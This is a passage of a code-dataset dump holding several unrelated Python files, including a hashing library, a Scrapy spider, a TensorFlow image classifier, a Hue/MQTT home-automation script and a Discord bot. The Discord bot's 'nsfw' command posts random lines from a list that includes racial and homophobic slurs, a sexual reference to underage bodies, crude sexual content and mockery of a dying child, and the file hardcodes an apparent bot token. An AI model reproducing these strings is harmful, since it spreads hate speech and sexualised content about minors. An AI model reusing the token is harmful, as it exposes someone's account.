allure.step('API response: ' + str(response))\n assert response['code'] == '200'\n assert response['time_total'] < 3000\n # assert 1\n else:\n print('Method is invalid')\n # log.info('Method is invalid')\n allure.step('API response: ' + 'Method is invalid')\n # assert 1\n\n\ndef test_two():\n assert 1\n# if __name__ == '__main__':\n# aa = test_single.get_data()\n","sub_path":"autoTest/flow/test_flow.py","file_name":"test_flow.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"109015087","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os, sys, hashlib, base64, zlib\nfrom ctypes import cast, memmove, POINTER, c_void_p\nfrom .structs import EVPobject\n\nopaque_repr = False\n\nclass ResumableHasher(object):\n name = None\n _algorithms_guaranteed = getattr(hashlib,\n \"algorithms_guaranteed\",\n [\"md5\", \"sha1\", \"sha224\", \"sha256\", \"sha384\", \"sha512\"])\n\n def __init__(self, name=None, data=None, state=None):\n if state is not None:\n if not self.name:\n raise Exception('Parameter \"name\" is required')\n self.__setstate__(state=dict(name=name, md_data=zlib.decompress(base64.b64decode(state))))\n if data is not None:\n self.update(data)\n return\n if self.name is not None:\n data = name\n else:\n self.name = name\n if not self.name:\n raise Exception('Parameter \"name\" is required')\n hasher_args = [] if data is None else [data]\n self._hasher = self._get_hashlib_hasher(self.name)(*hasher_args)\n\n def _get_hashlib_hasher(self, name):\n if name.startswith(\"blake2\"):\n raise Exception(\"blake2 algorithms are not OpenSSL-based and not supported by rehash\")\n if name.startswith(\"sha3\"):\n raise Exception(\"sha3 algorithms are not supported by rehash\")\n if name.startswith(\"shake\"):\n raise Exception(\"shake algorithms are not supported by rehash\")\n if name in self._algorithms_guaranteed:\n return getattr(hashlib, name)\n else:\n # hashlib.new(name) returns a hash object, not a constructor;\n # wrap it so callers can invoke the result like the named constructors above\n return lambda *args: hashlib.new(name, *args)\n\n def _get_evp_md_ctx(self):\n c_evp_obj = cast(c_void_p(id(self._hasher)), POINTER(EVPobject))\n if hasattr(c_evp_obj.contents.ctx, \"contents\"):\n return c_evp_obj.contents.ctx.contents\n else:\n return c_evp_obj.contents.ctx\n\n def __getstate__(self):\n ctx = self._get_evp_md_ctx()\n ctx_size = ctx.digest.contents.ctx_size\n hasher_state = ctx.md_data[:ctx_size]\n return dict(name=self.name, md_data=hasher_state)\n\n def __setstate__(self, state):\n self.name = state[\"name\"]\n self._hasher = self._get_hashlib_hasher(self.name)()\n ctx = self._get_evp_md_ctx()\n ctx_size = ctx.digest.contents.ctx_size\n memmove(ctx.md_data, state[\"md_data\"], ctx_size)\n\n def __getattr__(self, a):\n return getattr(self._hasher, a)\n\n def __repr__(self):\n if opaque_repr:\n return \"{}.{}()\".format(self.__module__, self.__class__.__name__)\n else:\n md_data = base64.b64encode(zlib.compress(self.__getstate__()[\"md_data\"])).decode()\n return \"{}.{}(state='{}')\".format(self.__module__, self.name, md_data)\n\n\nnew = ResumableHasher\n\ndef _initialize():\n module = sys.modules[__name__]\n for name in ResumableHasher._algorithms_guaranteed:\n if name.startswith(\"blake2\") or name.startswith(\"sha3\") or name.startswith(\"shake\"):\n continue\n setattr(module, name, type(name, (ResumableHasher,), 
dict(name=name)))\n\n\n_initialize()\n","sub_path":"rehash/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"167805391","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom spider import redis\nfrom spider import settings\nimport os\nimport re\nimport time\nfrom spider.items import ZonghengChapterDetail\n\n\nclass DetailspiderSpider(scrapy.Spider):\n name = \"detailspider\"\n allowed_domains = [\"zongheng.com\"]\n\n # start_urls = ['http://zongheng.com/']\n\n def __init__(self, name=None, **kwargs):\n super().__init__(name, **kwargs)\n links = redis.redisConnect.smembers(settings.CHAPTER_SET)\n if len(links) > 0:\n for link in links:\n self.start_urls.append(str(link, encoding='utf8'))\n\n def parse(self, response):\n url = response.url\n find = re.findall('\\d+', url)\n absPath = os.path.abspath('.') + '/book'\n bookDir = absPath + '/zh/' + str(find[0])\n bookChapterPath = absPath + '/zh/' + str(find[0]) + '/' + str(find[1]) + '.txt'\n bookChapterRelativePath = '/zh/' + str(find[0]) + '/' + str(find[1]) + '.txt'\n if not os.path.exists(bookDir):\n os.makedirs(bookDir)\n content = response.xpath(\"//div[@id='chapterContent']/p/text()\").extract()\n textNumber = response.xpath('//*[@id=\"uiContentPanel\"]/div[7]/span/em[2]/span/text()').extract()[0]\n textNumber = int(textNumber)\n updateTime = response.xpath('//*[@id=\"uiContentPanel\"]/div[7]/span/em[1]/span/text()').extract()[0]\n updateTime = time.mktime(time.strptime(updateTime, '%Y-%m-%d %H:%M:%S'))\n if len(content) > 0:\n f = open(bookChapterPath, 'a')\n f.write('')\n for text in content:\n f.write(text.strip() + '\\n')\n f.close()\n item = ZonghengChapterDetail()\n item['chapterPath'] = bookChapterRelativePath\n item['chapterTextNumber'] = textNumber\n item['updateAt'] = updateTime\n item['chapterHref'] = url\n yield item\n","sub_path":"spider/spiders/detailspider.py","file_name":"detailspider.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"316975758","text":"def bag_of_words(text):\n bow=dict()\n for w in text.split(' '):\n if w in bow.keys():\n bow[w]+=1\n else:\n bow[w]=1\n return bow\n\ntest_text = 'the quick brown fox jumps over the lazy dog'\n\nprint(bag_of_words(test_text))","sub_path":"intro-to-tflearn/bow.py","file_name":"bow.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"13536498","text":"# ======================================================================\n# There are 5 questions in this exam with increasing difficulty from 1-5.\n# Please note that the weight of the grade for the question is relative\n# to its difficulty. 
So your Category 1 question will score significantly\n# less than your Category 5 question.\n#\n# Don't use lambda layers in your model.\n# You do not need them to solve the question.\n# Lambda layers are not supported by the grading infrastructure.\n#\n# You must use the Submit and Test button to submit your model\n# at least once in this category before you finally submit your exam,\n# otherwise you will score zero for this category.\n# ======================================================================\n#\n# Computer Vision with CNNs\n#\n# Build a classifier for Rock-Paper-Scissors based on the rock_paper_scissors\n# TensorFlow dataset.\n#\n# IMPORTANT: Your final layer should be as shown. Do not change the\n# provided code, or the tests may fail\n#\n# IMPORTANT: Images will be tested as 150x150 with 3 bytes of color depth\n# So ensure that your input layer is designed accordingly, or the tests\n# may fail. \n#\n# NOTE THAT THIS IS UNLABELLED DATA. \n# You can use the ImageDataGenerator to automatically label it\n# and we have provided some starter code.\n\n\nimport urllib.request\nimport zipfile\nimport tensorflow as tf\nfrom keras_preprocessing.image import ImageDataGenerator\n\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau\nfrom keras.optimizers import Adam\n\nes=EarlyStopping(\n patience=10,\n verbose=1,\n monitor='val_loss'\n)\n\nrl=ReduceLROnPlateau(\n patience=5,\n verbose=1,\n factor=0.5,\n monitor='val_loss'\n)\n\ndef solution_model():\n url = 'https://storage.googleapis.com/download.tensorflow.org/data/rps.zip'\n urllib.request.urlretrieve(url, 'rps.zip')\n local_zip = 'rps.zip'\n zip_ref = zipfile.ZipFile(local_zip, 'r')\n zip_ref.extractall('tmp/')\n zip_ref.close()\n\n TRAINING_DIR = \"tmp/rps/\"\n training_datagen = ImageDataGenerator(\n width_shift_range=0.1,\n height_shift_range=0.1,\n zoom_range=0.1,\n horizontal_flip=True,\n vertical_flip=True,\n rescale=1./255,\n validation_split=0.2\n )\n\n validation_datagen=ImageDataGenerator(\n rescale=1./255,\n validation_split=0.2\n )\n # YOUR CODE HERE\n\n train_generator=training_datagen.flow_from_directory(\n 'tmp/rps/',\n subset='training',\n batch_size=32,\n target_size=(150, 150),\n ) # YOUR CODE HERE\n\n val_generator=validation_datagen.flow_from_directory(\n 'tmp/rps/',\n subset='validation',\n batch_size=32,\n target_size=(150, 150)\n )\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(128, 2, padding='same', input_shape=(150, 150, 3)),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(128, 2, padding='same'),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(128, 3),\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(64, activation='relu'),\n # YOUR CODE HERE, BUT END WITH A 3 Neuron Dense, activated by softmax\n tf.keras.layers.Dense(3, activation='softmax')\n ])\n\n model.compile(\n loss='categorical_crossentropy',\n optimizer=Adam(\n learning_rate=0.001\n ),\n metrics=['acc']\n )\n\n model.fit(\n train_generator,\n validation_data=val_generator,\n epochs=300,\n 
batch_size=32,\n callbacks=[es, rl]\n )\n\n loss=model.evaluate(\n val_generator\n )\n\n print('loss : ', loss[0])\n print('acc : ', loss[1])\n\n return model\n\n\n# Note that you'll need to save your model as a .h5 like this.\n# When you press the Submit and Test button, your saved .h5 model will\n# be sent to the testing infrastructure for scoring\n# and the score will be returned to you.\nif __name__ == '__main__':\n model = solution_model()\n model.save(\"mymodel3.h5\")\n","sub_path":"AI/Study_self/tf_certificate/Category3/starter3_answer.py","file_name":"starter3_answer.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"480890441","text":"import discord\r\nfrom discord.ext import commands\r\nimport sys\r\nimport discord\r\nimport time\r\nimport sys\r\nimport os\r\nimport random\r\nimport subprocess\r\nimport traceback\r\nfrom discord import errors\r\nimport json\r\nimport random\r\nbot = commands.Bot(command_prefix=\"ik\", description=\"Discripto\")\r\ntry:\r\n\tbot.load_extension(\"REPL\")\r\nexcept:\r\n\tprint(\"Hmm\")\r\n###NSFW ALERT\r\na= [\"i fuck my teddy bear and cum in it\",\r\n\"reaxt im going to shove a football down your nosetril\",\r\n\"hows it hangin? from a string probably\",\"*ping* while u were slurping pussy from a bendy straw i studied the blade\",\r\n\"i was in a good mood laughing at stupid as fuck deaths then 11 year old cancer child's last moments happend\",\"why does it look like electricity is coming out of their dick\",\"horsecock tho :heart:\",\"*ping* THAT DOES IT FAGGOT! IM NOT A FURRY OR CLOSET FURRY! SHUT THE FUCK UP! EAT ASS AND DIE!\",\"Hey faggots you can buy yourself dragon dildos 40% off tomorrow\",\r\n\"Oh no I need my underage boobies !!!\",\r\n\"Paul Blart: Mall Cop is my favorite movie\",\r\n\"Does anyone here know how to download club penguin?\",\r\n\"shes gonna find your dirty mageziens\",\"bedroom? if you insist. i mean you are pretty cute. he took my hand, i blush deeply. as we walk to the bedroom. i pull out my bad dick. wow i thought you were a lady. well, whatever works!! narrator it didnt work. its ok my surgeon is the best my surgeon did a good job on me. i was once a dog. conveniently, he identifies as a dogkin. wow thats quite a surprise you know what else is surprising? he had a 13 inch dog penis it was red and everything, but like as a joke anyways i fucked it. my parents are really proud of him for that massive honk they were also happy with my ability to take such a massive dog... to think i was gay before( now im mega gay!)\",\r\n\" named the image of the citadel nigger.jpg\",\"```make a website like real people``` this server is to use the bots, you cant do that on websites\",\r\n\"im wating the security cams in a chinese nursing home lobby\",\"node.js more like nude.js\",\"If Im going to blow a man, Id like to have his dick wrapped in a hot dog bun\",\r\n\"should be called baka\",\r\n\"ASIANBOI\",\r\n\"if ma girl ever cheats on me ill stick her to a chair and make her watch me have sex with the guy who cheated on me with\",\r\n\"Your midget spunnerr spun for 3 minutes 12 seconds. 
Congratulations, you now have asshole cancer\",\r\n\"Pls stop i have miniophobia\"]\r\n###NFSW END\r\n@bot.command()\r\nasync def nsfw(ctx):\r\n \"\"\"Its NSFW ;-)\"\"\"\r\n await ctx.send(random.choice(a))\r\n###NSFW END\r\n\r\n@bot.command()\r\nasync def yeet(ctx):\r\n \"\"\"Sends a simple Hello Message\"\"\"\r\n await ctx.send(\"Sup!!\")\r\n@bot.command()\r\nasync def mime(ctx, *, something):\r\n await ctx.send(something)\r\n#bot.remove_command('help')\r\n#@bot.command()\r\n#async def help(ctx):\r\n\t#await ctx.send(\"Figure it out Yourself!\")\r\n@bot.command()\r\nasync def cult(ctx, member: discord.User):\r\n await member.send(\"Wanna Join the Illuminati?\")\r\n@bot.command()\r\nasync def shout(ctx):\r\n\tawait ctx.send(ctx.author.mention)\r\n@bot.command()\r\nasync def mention(ctx):\r\n await ctx.author.send(ctx.author.mention)\r\n@bot.event\r\nasync def on_member_join(member):\r\n guild = member.guild\r\n await member.send(\"Welcome to {}!\".format(guild.name))\r\n\r\n@bot.command()\r\nasync def add(ctx,a,b):\r\n\tc=int(a)+int(b)\r\n\tawait ctx.send(c)\r\n\r\n@bot.event\r\nasync def on_command_error(ctx, exception):\r\n\tif type(exception) is commands.errors.CommandNotFound:\r\n\t\tawait ctx.send(\"Cant do that mate\")\r\n\tif type(exception) is commands.errors.MissingRequiredArgument:\r\n\t\tawait ctx.send(\"You are missing Arguments there buddy!\")\r\ndef check(ctx):\r\n return ctx.message.author.id == 199129403458977792\r\n\r\n@bot.command()\r\n@commands.check(check)\r\nasync def owner(ctx):\r\n await ctx.send('Thanks for making me!')\r\n\r\n@bot.command()\r\n@commands.has_any_role('Sigurd', 'Jacques', 'DR', 'beebee', 'chokkers delight', 'Alexa', 'Lava', 'Norway', 'jacob', 'couch', 'Brutally', 'Hunt', 'Cops', 'bob', 'DJ V/SA', 'Alena', 'new role', 'Shrew', 'Tequila', 'Xam', 'Karlie', 'Monday Meme', 'musik', 'Usagirl', 'Batman', 'Random', 'Octavia', 'Pikachu', 'Jacq', 'Perolina', 'soul', 'Riddle Honor', 'Mallu', 'Bots', 'Dark Kun', 'Labeeb', 'Pain', 'Pop', 'DJ','Members')\r\nasync def cool(ctx):\r\n await ctx.send('You are cool indeed')\r\n@bot.command()\r\nasync def embed(ctx,title,text):\r\n\tawait ctx.send(embed=discord.Embed(title=title,description=text,colour=discord.Colour(0xFF000)))\r\n\r\nemo=\":regional_indicator_\"\r\nji=\":\" \r\ncat=\"\"\r\n@bot.command()\r\nasync def emote(ctx,word):\r\n\tcat=\"\"\r\n\tfor i in word:\r\n\t\ti=emo+i+ji\r\n\t\tcat=cat+i\r\n\tawait ctx.send(cat)\r\n\t\r\nbot.run(\"NDM0MDE5OTc4Nzg2ODk3OTMw.DbJaAg.ZMYTYDeGStoTJwsBpLBa8LD8cow\") \r\n\r\n\r\n\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"273624651","text":"#https://github.com/studioimaginaire/phue\n\n\n#https://pypi.python.org/pypi/paho-mqtt/1.1\nimport paho.mqtt.client as mqtt\nimport json\nfrom phue import Bridge\n#just to get host name\nimport socket \nfrom time import sleep\nimport time\nfrom math import ceil\nimport logging as log\nimport sys,os\nimport cfg\nfrom mqtt import mqtt_start\nimport threading\nimport time\n\ndef debounce(in_time):\n current_time = time.time()\n delta = current_time - in_time\n return (delta > 2),current_time\n\ndebounce_1_prev = 0\ndef debounce_1():\n global debounce_1_prev\n res,debounce_1_prev = debounce(debounce_1_prev)\n return res\n\ndebounce_2_prev = 0\ndef debounce_2():\n global debounce_2_prev\n res,debounce_2_prev = debounce(debounce_2_prev)\n return res\n\ndebounce_3_prev = 0\ndef debounce_3():\n global 
debounce_3_prev\n res,debounce_3_prev = debounce(debounce_3_prev)\n return res\n\ndef bed_light_button(payload):\n if(debounce_1()):\n log.debug(\"bed_light_button> taken\")\n sensor = json.loads(payload)\n if(\"click\" in sensor and sensor[\"click\"] == \"single\"):\n if(lights[\"Bed Malm\"].on):\n lights[\"Bed N\"].on = False\n lights[\"Bed Malm\"].on = False\n lights[\"Bed W\"].on = False\n log.debug(\"bed_light_button> set light off\")\n else:\n #switch on and brightness command together so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Bed Malm\", {'on' : True, 'bri' : 254})\n b.set_light(\"Bed N\", {'on' : True, 'bri' : 254})\n b.set_light(\"Bed W\", {'on' : True, 'bri' : 254})\n log.debug(\"bed_light_button> set light to MAX\")\n elif(\"action\" in sensor and sensor[\"action\"] == \"hold\"):\n b.set_light(\"Bed Malm\", {'on' : True, 'bri' : 1})\n lights[\"Bed N\"].on = False\n lights[\"Bed W\"].on = False\n log.debug(\"bed_light_button> set light to min\")\n #else:\n #log.debug(\"bed_light_button> debounced\")\n return\n\ndef bathroom_shelly_light(cmd):\n topic = \"shellies/shellyswitch25-B8A4EE/relay/0/command\"\n clientMQTT.publish(topic,cmd)\n log.debug(f\"set_light_relay> to {cmd}\")\n return\n\ndef bathroom_light_hue():\n #switch on and brightness command together so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n log.debug(\"bathroom_light_hue> set light to min\")\n return\n\ndef bathroom_light_button(payload):\n if(debounce_2()):\n log.debug(\"bathroom light> taken\")\n sensor = json.loads(payload)\n if(\"click\" in sensor and sensor[\"click\"] == \"single\"):\n #state = b.get_light(\"Bathroom main\")\n #if(not state[\"state\"][\"reachable\"]):\n bathroom_shelly_light(\"on\")\n threading.Timer(1, bathroom_light_hue).start()\n #else:\n # if(lights[\"Bathroom main\"].on):\n # lights[\"Bathroom main\"].on = False\n # log.debug(\"bathroom light> set light off\")\n # else:\n # b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n # log.debug(\"bathroom_light_button> set light to min\")\n elif(\"action\" in sensor and sensor[\"action\"] == \"hold\"):\n b.set_light(\"Bathroom main\", {'on' : True, 'bri' : 1})\n log.debug(\"bathroom light> set light to min\")\n return\n\ndef livroom_light_button(payload):\n if(debounce_3()):\n log.debug(\"living room light> taken\")\n sensor = json.loads(payload)\n if(\"click\" in sensor and sensor[\"click\"] == \"single\"):\n if(lights[\"LivingTop5\"].on):\n lights[\"LivingTop1\"].on = False\n lights[\"LivingTop2\"].on = False\n lights[\"LivingTop3\"].on = False\n lights[\"LivingTop4\"].on = False\n lights[\"LivingTop5\"].on = False\n log.debug(\"living room light> set light off\")\n else:\n #switch on and brightness command together so that it does not go to previous level before adjusting the brightness\n b.set_light(\"LivingTop1\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop2\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop3\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop4\", {'on' : True, 'bri' : 254})\n b.set_light(\"LivingTop5\", {'on' : True, 'bri' : 254})\n log.debug(\"living room light> set light to MAX\")\n elif(\"action\" in sensor and sensor[\"action\"] == \"hold\"):\n b.set_light(\"LivingTop1\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop2\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop3\", {'on' : True, 'bri' : 
1})\n b.set_light(\"LivingTop4\", {'on' : True, 'bri' : 1})\n b.set_light(\"LivingTop5\", {'on' : True, 'bri' : 1})\n log.debug(\"living room light> set light to min\")\n return\n\ndef office_switch(payload):\n switch = json.loads(payload)\n if(\"click\" in switch and switch[\"click\"] == \"single\"):\n if(lights[\"Office main\"].on):\n lights[\"Office main\"].on = False\n log.debug(\"office_light> off\")\n else:\n #command so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Office main\", {'on' : True, 'bri' : 255})\n log.debug(\"office_light> on\")\n elif(\"action\" in switch and switch[\"action\"] == \"hold\"):\n b.set_light(\"Office main\", {'on' : True, 'bri' : 1})\n log.debug(\"office_light> low\")\n #else:\n # log.debug(\"office_light>no click\")\n return\n\ndef entrance_light(payload):\n jval = json.loads(payload)\n if(\"click\" in jval and jval[\"click\"] == \"single\"):\n if(lights[\"Entrance White 1\"].on):\n lights[\"Entrance White 1\"].on = False\n lights[\"Entrance White 2\"].on = False\n log.debug(\"entrance_light> off\")\n else:\n #command so that it does not go to previous level before adjusting the brightness\n b.set_light(\"Entrance White 1\", {'on' : True, 'bri' : 255})\n b.set_light(\"Entrance White 2\", {'on' : True, 'bri' : 255})\n log.debug(\"entrance_light> on\")\n elif(\"contact\" in jval and jval[\"contact\"] == False):\n #TODO check brightness here - and diff between coming or going away\n log.debug(\"entrance_door>open\")\n else:\n log.debug(\"entrance_light>no click\")\n return\n\ndef mqtt_on_message(client, userdata, msg):\n try:\n topic_parts = msg.topic.split('/')\n if(len(topic_parts) == 2):\n name = topic_parts[1]\n if(name == \"bed light button\") or (name == \"bed nic button\"):\n bed_light_button(msg.payload)\n elif(name == \"office switch\"):\n office_switch(msg.payload)\n elif(name == \"tree button\"):\n bathroom_light_button(msg.payload)\n elif(name == \"liv light 1 button\"):\n livroom_light_button(msg.payload)\n else:\n log.error(\"topic: \"+msg.topic + \"size not matching\")\n except Exception as e:\n log.error(\"mqtt_on_message> Exception :%s\"%e)\n return\n\n# -------------------- main -------------------- \nconfig = cfg.configure_log(__file__)\n\n# -------------------- Philips Hue Client -------------------- \nlog.info(\"Check Bridge Presence\")\n\nif(cfg.ping(config[\"bridges\"][\"LivingRoom\"])):\n b = Bridge(config[\"bridges\"][\"LivingRoom\"])\n log.info(\"Bridge Connection\")\n b.connect()\n log.info(\"Light Objects retrieval\")\n lights = b.get_light_objects('name')\n log.info(\"Hue Lights available :\")\n for name, light in lights.items():\n log.info(name)\n \nelse:\n log.info(\"Bridge ip not responding\")\n\n\n# -------------------- Mqtt Client -------------------- \n#will start a separate thread for looping\nclientMQTT = mqtt_start(config,mqtt_on_message,True)\n\nwhile(True):\n sleep(0.2)\n #The MQTT keeps looping on a thead\n #All there is to do here is not to exit\n","sub_path":"raspi/hue/hue.py","file_name":"hue.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"145120327","text":"#! /usr/bin/env python\n\nimport os\nimport glob\nimport shutil \nimport itertools\nimport re \n\n# requires a main folder with:\n# nexusFiles - folder containing all nexus files to run\n# rb_scripts - folder with all rev scripts to run. pbs script. MCMC. Model. 
and emp analysis script\n\n# Make folders for each locus and put nexus file into inner \"data\" folder\ndef makeFolders(n, suffix, mainDir):\n\tnexus=str(n)\n\tnexusIndex = nexus.find(suffix)\n\tfName = nexus[:nexusIndex]\n\t\n\t# Create paths\n\tdirPath = os.path.join(mainDir,fName)\n\tdataPath = os.path.join(mainDir,fName,\"data\")\n\n\t# Make directories\n\tif not os.path.exists(dirPath):\n\t\tos.mkdir(dirPath)\t\n\tif not os.path.exists(dataPath):\n\t\tos.mkdir(dataPath)\t\n\n\t# Copy nexus to data folder\n\tos.system(\"rm %s\" % (dataPath+\"/\"+n))\n\tprint(n)\n\tos.system(\"cp %s %s\" % (n,dataPath))\n\treturn dirPath,fName\n\ndef editFile(file,old,new):\n\twith open(file, \"r+\") as f:\n\t\t\tfiledata = f.read()\n\t\t\tfiledata = re.sub(old,str(new), filedata)\n\t\t\tf.seek(0)\n\t\t\tf.write(filedata)\n\t\t\tf.truncate()\n\ndef setup(mainDir,suffix,folders=False):\n\tscriptDir = os.path.join(mainDir,\"rb_scripts/\")\n\tos.chdir(mainDir)\n\tfor n in glob.glob('*%s' % suffix):\n\t\tif folders:\n\t\t\tx = makeFolders(n, suffix, mainDir)\n\t\t\tdirPath = x[0]\n\t\t\tfName = x[1] \n\t\telse:\n\t\t\tnexus=str(n)\n\t\t\tnexusIndex = nexus.find(suffix)\n\t\t\tfName = nexus[:nexusIndex]\n\t\t\tdirPath = os.path.join(mainDir,fName)\n\t\t# make folder for rev scripts\n\t\tscriptPath = os.path.join(dirPath,\"scripts/\")\n\t\tif not os.path.exists(scriptPath):\n\t\t\tos.mkdir(scriptPath)\t\n\t\t# Copy RevBayes scripts folder to gene script folder\n\t\tos.system(\"cp -r %s/* %s\" % (scriptDir, scriptPath))\n\t\tos.chdir(scriptPath)\n\t\teditFile(\"emp_analysis.Rev\",\"tacocat\",fName)\n\t\teditFile(\"emp_analysis.Rev\",\"racecar\",suffix)\n\t\teditFile(\"job_emp_rb.pbs\",\"tacocat\",fName)\n\t\t# Move pbs script up a folder\n\t\tos.system(\"mv job_emp_rb.pbs %s\" % (dirPath))\n\t\tos.chdir(mainDir)\n\n\n\nmainDir=os.getcwd()\nsetup(mainDir,\".ntg.nex\",True)\n\n","sub_path":"GeneTree_RevBayes/emp_setup.py","file_name":"emp_setup.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"449545039","text":"'''\nConvert excel column names to integers and vice-versa\n'''\n\nfrom string import ascii_uppercase\n\ndef xlcol2num(x):\n '''\n >>> xlcol2num('A')\n 1\n >>> xlcol2num('AA')\n 27\n >>> xlcol2num('KN')\n 300\n >>> xlcol2num('DKJ')\n 3000\n >>> xlcol2num('GJH')\n 5000\n '''\n if list(x) != [c for c in x if c in ascii_uppercase]:\n raise ValueError('Invalid excel column')\n return reduce(lambda s, a: s * 26 + ord(a) - ord('A') + 1, x, 0)\n\ndef num2xlcol(n):\n '''\n >>> num2xlcol(1)\n u'A'\n >>> num2xlcol(27)\n u'AA'\n >>> num2xlcol(300)\n u'KN'\n >>> num2xlcol(3000)\n u'DKJ'\n >>> num2xlcol(5000)\n u'GJH'\n '''\n if type(n) != int:\n raise ValueError('index must be an integer')\n if n < 1:\n raise ValueError('Index is too small')\n result = \"\"\n while True:\n if n > 26:\n n, r = divmod(n - 1, 26)\n result = chr(r + ord('A')) + result\n else:\n return unicode(chr(n + ord('A') - 1) + result)\n","sub_path":"xlsx/xlcols.py","file_name":"xlcols.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"307276001","text":"\"\"\"\ninput: weights = [ 4, 6, 10, 15, 16 ], length = 5, limit = 21\noutput: [ 3, 1 ] # since these are the indices of weights 15 and 6 whose sum equals 21\n\"\"\"\n\ndef get_indices_of_item_weights(weights, _, limit):\n \"\"\"\n YOUR CODE HERE\n 
\"\"\"\n weight_table = {}\n\n # build table of k=weight v=[idxs]\n for idx, weight in enumerate(weights):\n # because there may be items of the same weight, the index is stored in an array\n if weight not in weight_table:\n weight_table[weight] = [idx] # first\n else:\n weight_table[weight].append(idx) # additional (only need two of them via rules)\n\n # loop again trying to locate the matching weight\n for weight in weights:\n needed_weight = limit - weight\n \n # special case for items with the same weight\n if needed_weight == weight and len(weight_table[weight]) > 1:\n idx1 = weight_table[weight][1] # this idx is always larger\n idx2 = weight_table[weight][0]\n return (idx1, idx2)\n \n if needed_weight in weight_table:\n if weight + needed_weight == limit:\n # found the 2nd weight\n idx1 = weight_table[weight][0]\n idx2 = weight_table[needed_weight][0]\n if idx1 > idx2: # don't understand the purpose of this rule but ok\n return (idx1, idx2)\n else:\n return (idx2, idx1)\n\n return None","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"479575750","text":"import csv\nimport spotipy\n\nUNIQUE_ALBUMS_FNAME = 'billboard_albums_unique.csv'\nALBUMS_OUT_FNAME = 'unique_albums_exact_matches.csv'\n\ndef search_for_artist(artist, sp):\n artist_search = sp.search(artist, type='artist')\n\n best_artist_match = None\n\n for artist_result in artist_search['artists']['items']:\n res_name = artist_result['name'].lower()\n if artist.lower() == res_name:\n # this is our artist\n best_artist_match = artist_result\n break\n\n if best_artist_match is None:\n # then we're done\n return None\n\n artist_id = best_artist_match['id']\n\n return artist_id\n\ndef search_through_artist_for_album(artist_id, album, sp):\n albums_search = sp.artist_albums(artist_id,\n album_type='album',\n country='US')\n\n best_album_match = None\n for album_result in albums_search['items']:\n res_name = album_result['name'].lower()\n if album.lower() == res_name:\n best_album_match = album_result\n break\n\n if best_album_match is None:\n return None\n\n album_id = best_album_match['id']\n\n return album_id\n\nif __name__ == '__main__':\n\n all_artist_ids = {}\n\n sp = spotipy.Spotify()\n\n with open(UNIQUE_ALBUMS_FNAME) as f:\n freader = csv.reader(f)\n header = freader.next()\n\n with open(ALBUMS_OUT_FNAME,'w') as fout:\n fwriter = csv.writer(fout)\n headerout = header + ['artist.id','album.id']\n fwriter.writerow(headerout)\n\n for row in freader:\n artist_name = row[header.index('artist')]\n album_name = row[header.index('album')]\n\n try: artist_id = all_artist_ids[artist_name]\n except KeyError:\n artist_id = search_for_artist(artist_name, sp)\n all_artist_ids[artist_name] = artist_id\n\n if artist_id is None:\n fwriter.writerow(row)\n continue\n\n album_id = search_through_artist_for_album(artist_id,\n album_name,\n sp)\n\n if album_id is None:\n album_id = ''\n\n rowout = row + [artist_id, album_id]\n fwriter.writerow(rowout)\n","sub_path":"search_spotify.py","file_name":"search_spotify.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"617861940","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: 
